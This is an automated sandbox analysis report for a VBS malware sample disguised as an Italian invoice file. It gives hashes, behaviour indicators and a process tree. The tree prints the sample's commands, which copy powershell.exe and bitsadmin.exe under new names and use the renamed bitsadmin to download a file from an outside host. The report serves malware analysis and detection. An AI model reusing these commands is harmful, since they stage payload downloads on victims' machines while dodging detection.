Analysis
max time kernel: 35s
max time network: 123s
platform: windows7_x64
resource: win7v200430
submitted: 30-06-2020 11:36
Static task: static1

Behavioral task: behavioral1
Sample: FattDiffEmessa2020 00616840120.vbs
Resource: win7v200430 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: FattDiffEmessa2020 00616840120.vbs
Resource: win10 (windows10_x64)
0 signatures, 0 seconds
General
Target: FattDiffEmessa2020 00616840120.vbs
Size: 4KB
MD5: df040acc717de01627876e0ee3fa86df
SHA1: de8d3e73eaa96d6dc3140b63808fd7fa316cdc08
SHA256: e96c29490b415926118a9342760a5060070e9dd415aee367cca7a0e5146a45fe
SHA512: 9f563b9eea761dd6ef02db008a130ac207b2e610067489a29dac9f918cdda9ada9130e3b0e26aafb1653ded52f7080fbf2413fff3321c239db46b69839805db9
Score: 8/10
Malware Config
Signatures

Suspicious use of WriteProcessMemory (10 IoCs)
Processes:
  description                        pid   process      target process
  PID 1500 wrote to memory of 900    1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 900    1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 900    1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 1036   1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 1036   1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 1036   1500  WScript.exe  cmd.exe
  PID 1500 wrote to memory of 1564   1500  WScript.exe  uccBtRT.exe
  PID 1500 wrote to memory of 1564   1500  WScript.exe  uccBtRT.exe
  PID 1500 wrote to memory of 1564   1500  WScript.exe  uccBtRT.exe
  PID 1500 wrote to memory of 1564   1500  WScript.exe  uccBtRT.exe

Executes dropped EXE (1 IoCs)
Processes:
  pid   process
  1564  uccBtRT.exe
Processes (process tree; children are indented under their parent)

C:\Windows\System32\WScript.exe
  command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FattDiffEmessa2020 00616840120.vbs"
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\puccBtRT.exe

  C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\uccBtRT.exe

  C:\Users\Admin\AppData\Roaming\uccBtRT.exe
    command line: "C:\Users\Admin\AppData\Roaming\uccBtRT.exe" /transfer najtec /download https://nowyouknowent.com/werdona/00616840120/blank.css C:\Users\Admin\AppData\Roaming\blank.css
    signatures: Executes dropped EXE